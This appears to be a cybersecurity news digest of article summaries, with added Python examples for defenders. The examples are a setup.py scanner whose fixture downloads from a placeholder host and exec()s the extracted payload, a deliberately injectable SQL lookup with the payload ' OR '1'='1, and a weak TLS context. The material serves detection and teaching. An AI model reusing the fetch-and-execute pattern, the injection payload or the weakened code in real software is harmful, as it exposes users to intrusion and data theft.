Malicious Package on PyPI Hides Behind Image Files, Spreads Via GitHub
A new malicious package found on the Python Package Index (PyPI) hides code inside image files using a steganographic technique and is spread to users through open-source projects on GitHub.
The package's installation code first installs additional requirements on its own, then downloads a picture from the web, uses the newly installed package to extract the hidden payload from the image, and finally runs that extracted output with Python's exec().
The findings indicate that malicious PyPI packages and their obfuscation techniques are evolving rapidly. To protect against attacks like this, Check Point Research recommends that companies use code-scanning tools to double-check third-party packages and verify that the stars or ratings on GitHub projects are not synthetically generated.
https://www.infosecurity-magazine.com/news/malicious-package-pypi-hides-image/
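As an added example (not Check Point's tooling and not the malicious package itself), the script below does the kind of double-check the recommendation above describes: it parses a package's setup.py with Python's ast module and flags the three behaviours the article attributes to the package, an install-time pip install, a fetch from the network, and exec() on input that is not a string literal. The sample setup.py, the package name stegolib and the URL in it are constructed for illustration.

```python
"""Static triage of a Python package's setup.py for install-time code execution.

Added example, not Check Point's scanner: it walks the AST of a setup.py and
flags the pattern the article describes (installing extra requirements at
setup time, fetching content from the network, feeding the result to exec).
"""
import ast

NETWORK_MODULES = {"urllib", "urllib.request", "requests", "http.client", "socket"}
SHELL_CALLS = {"os.system", "os.popen", "subprocess.run", "subprocess.call",
               "subprocess.Popen", "subprocess.check_output", "subprocess.check_call"}
DYNAMIC_EXEC = {"exec", "eval", "compile", "__import__"}

# Constructed sample mimicking the described install-time behaviour.
# "stegolib" and the URL are placeholders, not the real package or host.
SAMPLE_SETUP_PY = """\
import subprocess, sys
from urllib.request import urlopen
from setuptools import setup

subprocess.check_call([sys.executable, "-m", "pip", "install", "stegolib"])
import stegolib

img = urlopen("https://example.invalid/picture.png").read()
exec(stegolib.reveal(img))

setup(name="example-pkg", version="0.1")
"""


def _dotted_name(node):
    """Return 'pkg.attr' for a Name/Attribute chain such as subprocess.run, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _literal_strings(node):
    """Yield every string constant nested anywhere under node."""
    for sub in ast.walk(node):
        if isinstance(sub, ast.Constant) and isinstance(sub.value, str):
            yield sub.value


def triage_setup_py(source):
    """Return a sorted list of (lineno, finding) for suspicious constructs in source."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            names = [node.module or ""]
        else:
            names = []
        for name in names:
            if name in NETWORK_MODULES or name.split(".")[0] in NETWORK_MODULES:
                findings.append((node.lineno, f"network import: {name}"))

        if isinstance(node, ast.Call):
            callee = _dotted_name(node.func)
            if callee in DYNAMIC_EXEC:
                # exec/eval on anything but a literal is the tell the article describes
                first = node.args[0] if node.args else None
                if not isinstance(first, ast.Constant):
                    findings.append((node.lineno,
                                     f"dynamic code execution: {callee}() on non-literal input"))
            elif callee in SHELL_CALLS:
                words = " ".join(_literal_strings(node))
                if "pip" in words and "install" in words:
                    findings.append((node.lineno, f"install-time pip install via {callee}()"))
                else:
                    findings.append((node.lineno, f"shell command via {callee}()"))
    return sorted(findings)


if __name__ == "__main__":
    for lineno, finding in triage_setup_py(SAMPLE_SETUP_PY):
        print(f"setup.py:{lineno}: {finding}")
```

Run it against the real setup.py of any dependency before trusting it. It is a triage aid that flags patterns, not a verdict: a clean result means none of these constructs were found at the top level of setup.py, not that the package is safe.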
Top Cyber Attacks of 2020
During the coronavirus pandemic, a large portion of the population switched to working, shopping, studying, and watching content online. As a result, cybercriminals had more access to potential victims than ever before.
The term "Zoombomb" was coined when attackers broke into private Zoom meetings or online classes to shout profanities and racist epithets or flash pornographic images. In an effort to politicize the pandemic, nation-state hacking groups launched attacks against organizations working to contain it, such as the World Health Organization and the Centers for Disease Control and Prevention.
In response to the massive economic precarity caused by the pandemic, even commonplace attacks like email phishing, social engineering, and refund fraud took on a darker character.
https://thehackernews.com/2021/01/top-cyber-attacks-of-2020.html
Secure Coding Practices for Developers
https://blog.convisoappsec.com/en/secure-coding-practices-for-developers/
This blog post covers secure coding practices for developers and highlights the problems that can arise when a product is launched without its code having been reviewed or tested for performance and security.
• Clean and check all entries (sanitize and validate every input)
• Don’t keep secrets in code
• Check for vulnerabilities in dependencies and external packages
• Apply secure authentication
• Apply the principle of least privilege
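As an added example (not code from the Conviso post), the block below applies three of the practices above to one small user lookup: the entry is checked against an allowlist and bound as a query parameter, the API key is read from the environment rather than from a literal in the source, and the database handle used by the lookup is restricted to reads. The schema, sample rows and environment variable name are constructed for illustration; the unsafe function is kept deliberately vulnerable so the difference is visible.

```python
"""Three of the listed practices applied to one lookup (added example, not from the post).

Constructed schema and rows; EXAMPLE_API_KEY is a placeholder variable name.
"""
import os
import re
import sqlite3

USERNAME_RE = re.compile(r"^[a-z0-9_]{3,32}$")   # allowlist of what a username may contain


def load_api_key(env_var="EXAMPLE_API_KEY"):
    """Secrets come from the environment (or a vault), never from a literal in code."""
    key = os.environ.get(env_var)
    if not key:
        raise RuntimeError(f"{env_var} is not set; refusing to start without a credential")
    return key


def lookup_user_unsafe(conn, username):
    """Deliberately vulnerable: the untrusted entry is spliced into the SQL text."""
    rows = conn.execute(f"SELECT name, role FROM users WHERE name = '{username}'")
    return rows.fetchall()


def lookup_user_safe(conn, username):
    """Check the entry against the allowlist, then bind it as a parameter."""
    if not USERNAME_RE.fullmatch(username):
        raise ValueError("username contains characters outside the allowed set")
    rows = conn.execute("SELECT name, role FROM users WHERE name = ?", (username,))
    return rows.fetchall()


def demo_database():
    """In-memory SQLite with constructed sample rows, opened for reads only."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "admin"), ("bob", "user"), ("carol", "user")])
    conn.execute("PRAGMA query_only = 1")   # least privilege: this handle can no longer write
    return conn


if __name__ == "__main__":
    conn = demo_database()
    payload = "' OR '1'='1"
    print("unsafe:", lookup_user_unsafe(conn, payload))   # every row leaks
    try:
        lookup_user_safe(conn, payload)
    except ValueError as err:
        print("safe rejected it:", err)
    print("safe:", lookup_user_safe(conn, "alice"))
```

The allowlist rejects the injection before the query is even built; parameter binding would defeat it on its own, but the regex also keeps garbage out of logs and downstream code. PRAGMA query_only makes any INSERT, UPDATE or DELETE through that handle fail, so a bug in the lookup path cannot become a write.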
Clicker Malware Garners Estimated 20 Million Downloads
"Clicker" malware designed to facilitate ad fraud has been found in 16 mobile apps on the Google Play store, according to McAfee. Detected as Android/Clicker, the malware was inserted into legitimate-looking utility apps such as flashlights, QR readers, cameras, unit converters and task managers.
Once the application is opened, it downloads its remote configuration with an HTTP request. After the configuration is downloaded, it registers an FCM (Firebase Cloud Messaging) listener to receive push messages. The malware then forces infected devices to visit and browse certain websites in the background, without the user's knowledge.
After being notified by the security vendor, Google removed the offending apps, which are estimated to have been downloaded as many as 20 million times.
https://www.infosecurity-magazine.com/news/clicker-malware-20-million/
Qatar World Cup Firms Urged to Upgrade Cyber-Threat Model
Organizing bodies and key partners of the FIFA World Cup in Qatar in autumn 2022 have been warned to strengthen their resilience against a potential barrage of cyber-threats.
Threat intelligence firm Digital Shadows said that the world's most-watched sporting event would attract scrutiny from a variety of threat actors.
“Scams could present themselves in many forms. For instance, financially motivated threat actors often plant in malicious URLs spoofing these events to fraudulent sites, hoping to maximize their chances of scamming naive internet users for a quick profit,” it warned in a blog post.
“At the same time, hacktivist groups may exploit the public attention given to such events to exponentially increase the reach of their message. State-sponsored advanced persistent threat (APT) groups may also decide to target global sporting events like the Qatar 2022 World Cup to achieve state goals to the hosting country or the broader event community.”
Digital Shadows urged organizations to take a risk-based approach to cybersecurity ahead of the event, focusing on cyber-hygiene best practices such as regular patching, multi-factor authentication (MFA) and phishing awareness.
“A risk-based approach enables your organization to adapt its cybersecurity program to specific needs and vulnerabilities by considering the potential impact of a certain phenomenon and its likelihood,” it concluded.
https://www.infosecurity-magazine.com/news/qatar-world-cup-firms-upgrade/
CISA Releases Vulnerability Management Methodology
CISA has published guidance on Stakeholder-Specific Vulnerability Categorization (SSVC), a vulnerability management approach that assesses vulnerabilities and prioritizes remediation based on a vulnerability's exploitation status, its impact on safety, and the prevalence of the affected product in a given system. Executive Assistant Director (EAD) Eric Goldstein says that adopting methodologies such as SSVC is a key step in advancing the vulnerability management ecosystem: CISA's Known Exploited Vulnerabilities (KEV) catalog, the Common Security Advisory Framework (CSAF) and the Vulnerability Exploitability eXchange (VEX) are meant to be used together with SSVC to shrink the window in which threat actors can exploit U.S. networks.
There is an urgent need for a standardized way for vendors to disclose security vulnerabilities to end users quickly and in an automated manner, particularly during busy commercial periods such as the holidays. CISA encourages organizations to use its version of SSVC, which provides a customized decision tree model that helps companies prioritize their vulnerability responses.
https://www.securitymagazine.com/articles/98611-cisa-releases-vulnerability-management-methodology
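To show what "a decision tree model" means in practice, and how the KEV catalog feeds it, here is an added example that is not CISA's code or its published tree. It encodes the four decision points CISA's SSVC guide uses (Exploitation, Automatable, Technical Impact, Mission and Well-being) and its four outcomes (Track, Track*, Attend, Act) as a lookup tree, derives the Exploitation point from a KEV-style list, and sorts a backlog by outcome. The leaf values are an assumption written for illustration and must be checked against CISA's published tree before real use; the CVE identifiers and inputs are constructed.

```python
"""SSVC-style triage of a vulnerability backlog (added example, not CISA's code).

Leaf values in DECISION_TREE are an assumption for illustration; verify them
against CISA's published SSVC tree. CVE identifiers below are constructed.
"""
from dataclasses import dataclass

EXPLOITATION = ("none", "poc", "active")
AUTOMATABLE = ("no", "yes")
TECHNICAL_IMPACT = ("partial", "total")
MISSION_WELLBEING = ("low", "medium", "high")
OUTCOME_RANK = {"Track": 0, "Track*": 1, "Attend": 2, "Act": 3}

# key: (exploitation, automatable, technical_impact)
# value: outcome for mission_wellbeing = low, medium, high   (assumed leaf values)
DECISION_TREE = {
    ("none",   "no",  "partial"): ("Track",  "Track",  "Track"),
    ("none",   "no",  "total"):   ("Track",  "Track",  "Track*"),
    ("none",   "yes", "partial"): ("Track",  "Track",  "Attend"),
    ("none",   "yes", "total"):   ("Track",  "Track*", "Attend"),
    ("poc",    "no",  "partial"): ("Track",  "Track",  "Track*"),
    ("poc",    "no",  "total"):   ("Track",  "Track*", "Attend"),
    ("poc",    "yes", "partial"): ("Track",  "Track*", "Attend"),
    ("poc",    "yes", "total"):   ("Track",  "Track*", "Attend"),
    ("active", "no",  "partial"): ("Track",  "Attend", "Attend"),
    ("active", "no",  "total"):   ("Attend", "Attend", "Act"),
    ("active", "yes", "partial"): ("Attend", "Attend", "Act"),
    ("active", "yes", "total"):   ("Attend", "Act",    "Act"),
}


@dataclass(frozen=True)
class Vulnerability:
    cve_id: str
    exploitation: str
    automatable: str
    technical_impact: str
    mission_wellbeing: str


def exploitation_status(cve_id, kev_ids, public_poc_ids=frozenset()):
    """Derive the Exploitation decision point from external evidence.

    A KEV listing is evidence of active exploitation and outranks a public PoC.
    """
    if cve_id in kev_ids:
        return "active"
    if cve_id in public_poc_ids:
        return "poc"
    return "none"


def decide(vuln):
    """Walk the tree and return one of Track, Track*, Attend, Act."""
    for value, allowed in ((vuln.exploitation, EXPLOITATION),
                           (vuln.automatable, AUTOMATABLE),
                           (vuln.technical_impact, TECHNICAL_IMPACT),
                           (vuln.mission_wellbeing, MISSION_WELLBEING)):
        if value not in allowed:
            raise ValueError(f"{value!r} is not one of {allowed}")
    leaves = DECISION_TREE[(vuln.exploitation, vuln.automatable, vuln.technical_impact)]
    return leaves[MISSION_WELLBEING.index(vuln.mission_wellbeing)]


def prioritize(vulns):
    """Return (outcome, vuln) pairs, most urgent first; ties keep input order."""
    return sorted(((decide(v), v) for v in vulns),
                  key=lambda pair: -OUTCOME_RANK[pair[0]])


if __name__ == "__main__":
    kev = {"CVE-0000-0001"}                       # constructed KEV-style list
    backlog = [
        Vulnerability("CVE-0000-0002", "none", "no", "partial", "low"),
        Vulnerability("CVE-0000-0001", exploitation_status("CVE-0000-0001", kev),
                      "yes", "total", "high"),
        Vulnerability("CVE-0000-0003", "poc", "yes", "total", "medium"),
    ]
    for outcome, v in prioritize(backlog):
        print(f"{outcome:7} {v.cve_id}")
```

The point of the tree, as opposed to a CVSS score, is that the same CVE lands in different rows for different stakeholders: Mission and Well-being is your input, not the vendor's, and a KEV listing moves the Exploitation point to active regardless of severity.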
Two men jailed in US for $6m cyber fraud scam
For their roles in the Nigerian-run operation, George Ugochukwu Egwumba, 47, of Cypress, and Princewell Arinze Duru, 33, of Sacramento, received sentences of more than 10 years each from different California courts.
In June, both men were found guilty of wire fraud and money laundering. The scheme defrauded victims, including elderly ones, of at least $6 million; the two are among 80 suspects currently in custody.
The Department of Justice (DoJ), which announced the sentencing, stated that “members of the conspiracy, many of whom were situated in Nigeria, used middlemen to communicate with their fellow co-conspirators stationed in the United States.”
The scheme involved “a wide range of frauds, including frauds involving business email compromise (BEC), romance scams, elder fraud, and fraud employing.
Through US bank accounts, money-transfer services like Western Union or MoneyGram, or cryptocurrencies, “the US-based middlemen participated in receiving and laundering the proceeds of the frauds.”
Egwumba, who also committed fraud himself "using malware and other cybercrime tools," collected bank account details from co-conspirators over chat messages, used those accounts to receive stolen funds, and passed the details on to other members of the scheme.
By opening fictitious company bank accounts, employing money-transfer services, and using cryptocurrency wallets, Duru assisted his fellow cybercriminals in receiving and laundering the proceeds of their crimes.
One of the ringleaders, Chuks Eroha, 42, remains at large and is thought to have fled to Nigeria after the Federal Bureau of Investigation issued a warrant for his arrest in 2017. US authorities have so far obtained 19 guilty pleas in connection with the operation.
https://cybernews.com/news/two-men-jailed-for-cyber-fraud-scam/
Misconfigurations and Vulnerabilities Found in 95% of Applications
Almost all applications these days have at least one vulnerability or misconfiguration that affects security. While many of those misconfigurations and vulnerabilities are rated medium severity or lower, at least 25% are rated high or critical. "This really just points out that, [while] organizations may be doing a good job performing static scans to lower the number of coding vulnerabilities, they are not taking configuration into account, as it may be more difficult."
The data argues for using multiple tools to analyze software for vulnerabilities and misconfigurations. Synopsys released data from several different kinds of tests, and each had similar top offenders: weak configurations of encryption, namely Secure Sockets Layer (SSL) and Transport Layer Security (TLS), topped the charts for static, dynamic, and mobile application security tests. Static and dynamic testing and software composition analysis (SCA) each have their advantages and should be used together for the best chance of catching misconfigurations and vulnerabilities, says Synopsys's Kelly. "These types of issues can be found in the early stages of the software development lifecycle (SDLC), such as the development and DevOps phases, which reduces the number that make it into production," he says.
https://www.darkreading.com/application-security/misconfigurations-vulnerabilities-found-in-95-of-applications
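The SSL/TLS misconfigurations that top the Synopsys data are catchable in code review as well as by dynamic testing. As an added example (not part of the Dark Reading article or Synopsys's tooling), the block below audits a Python ssl.SSLContext for three common weak settings and shows a deliberately weak client context beside a hardened one. It checks only what the ssl module exposes on the context object and never opens a connection; it assumes Python 3.7 or later with OpenSSL 1.1 or later, where minimum_version is available.

```python
"""Audit an ssl.SSLContext for weak TLS settings (added example, not Synopsys's tooling).

Inspects only the context object; no network connection is made.
"""
import ssl


def audit_tls_context(ctx):
    """Return a list of findings; an empty list means the context passes these checks."""
    findings = []
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        findings.append("minimum protocol version below TLS 1.2 (TLS 1.0/1.1 accepted)")
    if not ctx.check_hostname:
        findings.append("hostname verification disabled")
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        findings.append("peer certificate not required (verify_mode is not CERT_REQUIRED)")
    return findings


def weak_client_context():
    """Deliberately weak: accepts any certificate and any protocol version.

    This is what 'just make the certificate error go away' code tends to leave behind.
    """
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False          # must be cleared before verify_mode can be CERT_NONE
    ctx.verify_mode = ssl.CERT_NONE
    ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
    return ctx


def hardened_client_context():
    """Verifies the peer against the system trust store and refuses TLS below 1.2."""
    ctx = ssl.create_default_context()  # CERT_REQUIRED, check_hostname=True, system CAs loaded
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


if __name__ == "__main__":
    for name, ctx in (("weak", weak_client_context()), ("hardened", hardened_client_context())):
        print(name, audit_tls_context(ctx) or ["ok"])
```

The same three checks map directly onto what a DAST scanner reports from the outside (old protocol versions offered, certificate not validated); doing them on the context object catches the problem before the code ships, which is the SDLC point Kelly makes.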
I’d like to share some Vulnerability Scanners:
– Acunetix
Acunetix is a web vulnerability scanner whose advanced crawler can reach all types of web pages, including password-protected ones, and test them for vulnerabilities.
– BeSECURE
BeSECURE continuously scans for network and application vulnerabilities, with daily updates and specialized testing methods that its vendor says capture 99.99% of detectable vulnerabilities.
– Nessus
Nessus is a remote security scanning tool that scans a host and alerts the operator if it finds any vulnerabilities.
– Burp Suite
Burp Suite is a continually updated web vulnerability scanner that provides integrations for easy ticket generation.
https://www.coresecurity.com/blog/top-14-vulnerability-scanners-cybersecurity-professionals
A live stream failing in Nevada is “one of the ways blue states steal elections.”
About a week ago, a live-stream outage occurred at the registrar of voters in Washoe County, Nevada. It has been reported that the Washoe County stream went dark overnight on November 9, 2022. Because of the sequence of events, claims circulated on social media alleging that officials were involved in some sort of wrongdoing to alter the election results.
The live-stream application lost its connection to the courtesy cameras at 11:24 p.m. on November 9. All staff had left for the night about 60 minutes earlier and did not return to the office until 7 a.m. the next day; the connection was restored at 7:53 a.m. on November 10.
One of the mitigations documented on the county's website is to look for a solution that would prevent such software disruptions in the future, or to drop the courtesy live-stream feed altogether. The county believes this will maintain transparency and minimize unnecessary speculation about election interference.
https://www.politifact.com/factchecks/2022/nov/16/instagram-posts/nevada-ballot-counting-livestream-went-dark-but-vo/
https://washoelife.washoecounty.gov/washoe-county/registrar-of-voters-livestream-cameras/
Billbug APT Malware
The Billbug APT group compromised digital certificate authorities and other government agencies in several countries, apparently with the intent of stealing legitimate digital certificates. The intrusions used penetration-testing tools, and a loader malware planted a backdoor that gave the threat actors access to the victims' networks.
https://cybersecuritynews.com/billbug-apt-malware/